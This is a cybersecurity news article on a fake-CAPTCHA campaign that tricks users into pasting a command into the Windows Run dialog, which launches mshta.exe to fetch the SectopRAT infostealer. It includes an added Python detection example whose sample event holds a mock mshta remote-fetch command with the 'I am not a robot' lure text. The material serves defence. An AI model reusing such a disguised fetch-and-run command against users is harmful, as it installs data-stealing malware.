Fake CAPTCHA Forces Users to Run Malware Disguised as Verification Text

Fake CAPTCHA pages tricked users into pasting malware-laced commands into Windows Run, launching stealth attacks that silently deployed infostealers undetected.

Deceptive CAPTCHA Pages Deploy Stealth Malware Using Windows Run Exploit

Cybersecurity analysts in New Jersey flagged an alarming malware scheme this week targeting government employees through fraudulent CAPTCHA challenges. The New Jersey Cybersecurity and Communications Integration Cell (NJCCIC) revealed on March 20 that the attackers sent emails to state workers containing links to deceptive or compromised websites posing as security checks. According to NJCCIC:

The emails contain links directing targets to malicious or compromised websites and prompting deceptive CAPTCHA verification challenges.

These challenges were designed to fool users into running dangerous commands that secretly installed the SectopRAT infostealer.

The method was particularly sophisticated, using a clipboard-based trick to conceal its intent. Victims who clicked on the link were directed to a fake CAPTCHA page that automatically copied a command. The website then instructed users to paste the command into the Windows Run dialog as part of a supposed verification step. Although the final part of the pasted text read like a standard message—“I am not a robot – reCAPTCHA Verification ID: ####”—executing the command in fact launched mshta.exe, a legitimate Windows executable used to fetch and run malware disguised in common file types.
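The chain described above leaves a distinctive trace in endpoint telemetry: mshta.exe spawned by explorer.exe (the parent of anything typed into the Run dialog), handed a remote URL, with the "I am not a robot" lure text still sitting in the command line. The detection logic below is an added example, not code from NJCCIC or the article; the process-creation events are constructed samples and the URL is a placeholder.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (e.g. Sysmon Event ID 1 / EDR telemetry)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events, not real telemetry. The first mimics a command pasted
# into the Run dialog after a fake CAPTCHA page; the others are benign lookalikes.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 'mshta https://example.invalid/x  # "I am not a robot - reCAPTCHA Verification ID: 4821"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe C:\Tools\installer.hta"),  # local HTA from a script, no lure text
]

# Lure wording the fake CAPTCHA pages append so the pasted text looks like a verification step.
LURE_RE = re.compile(r"not a robot|recaptcha verification", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def classify(event: ProcessEvent) -> list[str]:
    """Return the reasons an event looks like a Run-dialog mshta lure (empty = benign)."""
    reasons = []
    image, parent = _basename(event.image), _basename(event.parent_image)
    if image == "mshta.exe" and parent == "explorer.exe":
        reasons.append("mshta.exe launched from explorer.exe (Run dialog or shell)")
    if image == "mshta.exe" and URL_RE.search(event.command_line):
        reasons.append("mshta.exe given a remote URL to fetch")
    if LURE_RE.search(event.command_line):
        reasons.append("CAPTCHA verification lure text in command line")
    return reasons


def detect(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, list[str]]]:
    """Filter events to those with at least one indicator, keeping the reasons for triage."""
    flagged = []
    for event in events:
        reasons = classify(event)
        if reasons:
            flagged.append((event, reasons))
    return flagged


if __name__ == "__main__":
    for event, reasons in detect(SAMPLE_EVENTS):
        print(event.command_line, "->", "; ".join(reasons))
```

Two or more reasons on one event is a strong signal; the explorer.exe parent alone also covers users who type the command into a PowerShell or cmd window only when that shell is itself the parent, so a production rule should extend the parent check accordingly.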

NJCCIC traced the campaign to compromised sites that used widely adopted tools: “Further analysis indicated that the identified compromised websites used technologies such as the WordPress Content Management System (CMS) platform and JavaScript Libraries.”

The investigation also uncovered a supply chain component targeting auto dealership websites via a compromised video service. Infected visitors risked downloading the same infostealer. Meanwhile, cybersecurity researchers documented related operations distributing other malware types:

Researchers also discovered similar fake CAPTCHA malware campaigns deploying Lumma and Vidar infostealers and stealthy rootkits. Legitimate CAPTCHA verification challenges validate a user’s identity and do not require users to copy and paste commands or output into a Windows Run dialog box.

Officials advised system administrators to update software, strengthen CMS credentials, and report incidents to the FBI’s Internet Crime Complaint Center and NJCCIC.
